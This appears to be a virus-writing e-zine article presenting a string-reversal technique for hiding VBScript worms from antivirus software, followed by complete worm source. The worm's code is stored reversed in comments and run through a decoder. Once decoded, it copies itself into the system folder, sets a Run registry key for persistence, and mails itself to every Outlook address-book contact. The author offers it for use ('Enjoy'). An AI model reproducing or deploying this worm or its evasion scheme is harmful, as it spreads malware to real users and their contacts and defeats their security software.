----------> Super VBS encryption <----------- Author:KaGra,Brigada ocho virii group member A. Ok folks,Du U want to make all your aLL vbS VIRII AND WORMS undetected by ALL AV Ventors?If so,this info gives you the knowledge to do So!This is a vbs G-encryption that I developed!! This is a very simple idea.All the real worm or virii code is in our new vbs encrypted worm (or virii) as comments.The strings of the real (non-encrypted) malware is placed in every line reversed.If you read the following source code line per line backwards,you'll see what I mean.All the other source code is for decrypting the encrypted virii,meaning that it simply reverses again the comments and stick it properly in memory,with the usage of the "execute()" function,that exists in VBS.The advantage is that the length of decryption routine is independant from the length of the worm source code,because it simply in every case is a 'readline' loop.The follow idea can e used in every vbs code,except one case:if there is already in the non-encrypted worm the execute function,there will be a bug in the encrypted worm,because an execute() function CANNOT run within another execute() function,eg. execute(execute(buffer)) cannot run buffer. This is just a Microsoft's bug...but it can be fixed....in another article!! Little knowledge of vbs is enough to understand the following by-this-way-I-mentioned encrypted worm. The worm just sends itself as an attachment in all addresses in the WAB,and places a regkey so that it will autorun at every boot of the PC.It also adds another regvalue which is a counter.This counter increases at every worm run,and when it reaches nu8mber 20,the worm will stop to replicate via Outlook. That's all U Virii-FrEaKs!!!Enjoy,and wait for our e-zine#2 at http://brigadaocho.host.sk Contact Me at:roallercoaster1@yahoo.com ----------------------------------------------->Worm source code begins here<------------------------------------------------ 'txeN emuseR rorrE nO ') "tcejbOmetsySeliF.gnitpircS" (tcejbOetaerC = 10A teS ') "SBV.YPSANNES" ,)1(redloFlaicepSteG.10A (htaPdliuB.10A ,emaNlluFtpircS.tpircSW eliFypoC.10A ') "llehS.tpircSW" (tcejbOetaerC = 20A teS ') "SBV.YPSANNES" ,)1(redloFlaicepSteG.10A (htaPdliuB.10A ,"YPSANNES" & "\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\ENIHCAM_LACOL_YEKH" etirWgeR.20A ') "YPSANNES" & "\ENIHCAM_LACOL_YEKH" (daeRgeR.20A = 40A 'nehT 02 > 40A rO "" = 40A fI '0 = 40A 'fI dnE 'nehT 0 = 40A fI ') "noitacilppA.kooltuO" (tcejbOetaerC = 50A teS ') "IPAM" (ecapSemaNteG.50A = 60A teS 'stsiLsserddA.60A nI 70A hcaE roF ') 0 (metIetaerC.50A = 80A teS 'tnuoC.seirtnEsserddA.70A oT 1 = 90A roF ') 90A (seirtnEsserddA.70A = 01A teS 'nehT 1 = 90A fI 'sserddA.01A = CCB.80A 'eslE 'sserddA.01A & " ;" & CCB.80A = CCB.80A 'fI dnE 'txeN '"tcejbuS" = tcejbuS.80A '"ydoB" = ydoB.80A 'emaNlluFtpircS.tpircSW ddA.stemhcattA.80A 'eurT = timbuSretfAeteleD.80A 'dneS.80A 'txeN '0 = 40A 'fI dnE '1 + 40A ,"YPSANNES" & "\ENIHCAM_LACOL_YEKH" etirWgeR.20A 'THE BLUE BUS IS CALLING US... 'On error resume next set fso=createobject("scripting.filesystemobject") set r=fso.opentextfile(wscript.scriptfullname) a=0 do buffer=r.readline buffer2=strreverse(buffer) buffer3=mid(buffer2,1,len(buffer2)-1) all=all & ":" & buffer3 a=a+1 loop while a<>31 Georgia=mid(all,2,len(all)-1) execute(Georgia) ----------------------------------------------->worm source code ends HeRe!<-------------------------------------------------